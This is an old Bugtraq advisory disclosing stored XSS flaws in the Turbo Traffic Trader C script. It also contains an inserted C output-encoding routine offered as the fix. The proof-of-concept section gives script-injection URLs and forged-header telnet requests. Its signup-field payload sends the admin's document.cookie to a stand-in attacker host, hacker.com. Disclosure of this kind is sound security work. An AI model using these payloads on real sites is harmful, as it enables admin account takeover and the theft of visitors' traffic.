
List:       bugtraq
Subject:    Multiple TTT-C XSS vulnerabilities
From:       Kaloyan Georgiev <spam () icefire ! org>
Date:       2004-05-17 2:46:11
Message-ID: 20040517024611.2321.qmail () www ! securityfocus ! com



--------------------------------------------------------
Subject: Multiple TTT-C (Turbo Traffic Trader C) XSS vulnerabilities.
Author: Kaloyan Olegov Georgiev (ICEFIRE)
Package name: Turbo Traffic Trader C (TTT-C or TTT3)
Summary: Multiple XSS issues
Date: 2004-05-16
Affected versions: Latest stable TTT version, all betas and release candidates.
Product site: http://www.turbotraffictrader.com/
Vendor response: nobody cares about you or what you have to say, it's really sad you
could be a wealthy person if you just had morals. Dude, I don't care if you post to
the boards, I really don't, people are sick of you, everyone that does not know what
a thief you are will know after I post, I am ready to take legal action against you.
Need I say more about this response?
Extended info: http://www.icefire.org/security/ttt-bugreport.txt
--------------------------------------------------------

Package description (from vendor's site):
The World's Most Advanced Free C Traffic Trading Script
Turbo Traffic Trader C 1.0 is an advanced trading script written entirely in
C/Sqlite, it offers you advanced features that cannot be found in other FREE scripts.

Problem description:
TTT-C does not sanitize any of its input variables. This allows trivial cross-site
scripting (XSS) and, in some cases, complete hijacking of a site's traffic.

Solution:
Don't use TTT-C, as the vendor does not seem to care much about any of these issues.
Message to the vendor: the best option is a string replacement routine like the one
in CjOverkill (or similar) that encodes characters such as <, >, % and so on before
they are written into the HTML output.
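As an added illustration of the string replacement routine suggested above (example code written for this note, not taken from TTT-C or CjOverkill), the function below HTML-encodes the five characters that let a stored log field break out of text or attribute context; a script using it would call html_escape() on every untrusted field (link, IP, proxy, referer, site name, URL, e-mail, ICQ) at the point where it is rendered into the admin panel or toplist. The function name and the refuse-on-overflow behaviour are this example's own choices.

```c
/* Added example: output encoding for untrusted fields before they are
 * placed in HTML. Written in C because TTT-C is a C/SQLite application. */
#include <stddef.h>
#include <string.h>

/* Encode & < > " ' as HTML entities. Writes a NUL-terminated string into
 * out (capacity outlen) and returns the number of bytes written, excluding
 * the NUL. Returns -1 and writes nothing if the buffer is too small, so a
 * caller can never emit a truncated, half-encoded string by accident. */
long html_escape(const char *in, char *out, size_t outlen)
{
    size_t need = 0, o = 0;
    const char *p;

    /* First pass: compute the encoded length so the size check is exact. */
    for (p = in; *p; p++) {
        switch (*p) {
        case '&':  need += 5; break;            /* &amp;  */
        case '<':
        case '>':  need += 4; break;            /* &lt; &gt; */
        case '"':  need += 6; break;            /* &quot; */
        case '\'': need += 5; break;            /* &#39;  */
        default:   need += 1;
        }
    }
    if (need + 1 > outlen)
        return -1;

    /* Second pass: copy, substituting the entity for each special char. */
    for (p = in; *p; p++) {
        const char *rep = NULL;
        switch (*p) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        if (rep) {
            size_t n = strlen(rep);
            memcpy(out + o, rep, n);
            o += n;
        } else {
            out[o++] = *p;
        }
    }
    out[o] = '\0';
    return (long)o;
}
```

Encoding at output time (rather than stripping at input time) keeps the log record intact for forensics while guaranteeing the browser shows the injected markup literally.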


Detailed problem description with proof of concept code:
Since no variable is sanitized, anyone can insert HTML code into the admin interface.
On sites with trade signups enabled it is also possible to hijack the whole admin
interface and steal the admin cookie in order to log in and take over the script. The
same flaw could be used to steal all the traffic a given site has.

Links panel XSS proof of concept code:
The link variable is not sanitized and is a valid XSS vector.
Example:
http://www.vulnerable.com/cgi-bin/ttt-out?link=testing%20%3Cscript%3Ealert('from_browser_insert');%3C/script%3E
http://www.vulnerable.com/cgi-bin/ttt-out?link=testing%20<script>alert('from_browser_insert');</script>


IP Logs panel XSS proof of concept code:
IP could be null.
IP could be a valid XSS vector.
Proxy is not sanitized.
Proxy could be a valid XSS vector.
Example for proxy:
telnet www.vulnerable.com 80
Trying www.vulnerable.com...
Connected to www.vulnerable.com.
Escape character is '^]'.
GET /cgi-bin/ttt-in HTTP/1.1
X-Forwarded-For: 192.168.0.1<script>alert('proxy_insert');</script>
Host: www.vulnerable.com

Example for IP (needs local server access):
export REMOTE_ADDR="127.0.0.1<script>alert('ip_inject');</script>"
./ttt-in then stores one bad record in the IP log.

Referer Logs panel XSS proof of concept code:
Referer is not sanitized and is a valid XSS vector.
telnet www.vulnerable.com 80
Trying www.vulnerable.com...
Connected to www.vulnerable.com.
Escape character is '^]'.
GET /cgi-bin/ttt-in HTTP/1.1
X-Forwarded-For: 192.168.0.6<script>alert('proxy_insert');</script>
Referer: http://www.referrer.com"<script>alert('referrer_inject');</script>"
Host: www.vulnerable.com

Edit Panel XSS:
See Main because Edit uses exactly the same variables.

Main control panel XSS (take care with this one, the example is a complete takeover):
For this one you must sign up for a trade. When you sign up as a new trade you need to
enter your site info and URL. Insert any HTML code there and it will work.
Example:
Site Name = http://www.owned.com"<script>cook=document.cookie;window.location='http://www.hacker.com/steal-admin-cookie.php?cook='+cook+'';</script>
Site URL = http://www.owned.com"<script>cook=document.cookie;window.location='http://www.hacker.com/steal-admin-cookie.php?cook='+cook+'';</script>
Webmaster e-mail = email@something.com"<script>alert('email_inject');</script>
Webmaster ICQ = 123456"<script>alert('ICQ_inject');</script>

This last one could lead to the theft of all the traffic the site has, because once
the site name or domain gets into the toplist, every visitor of that site will receive
the XSS payload and be redirected.

Any other HTML will work, so use your imagination. The examples are quite simple, but
they still make the point.

Kaloyan Olegov Georgiev

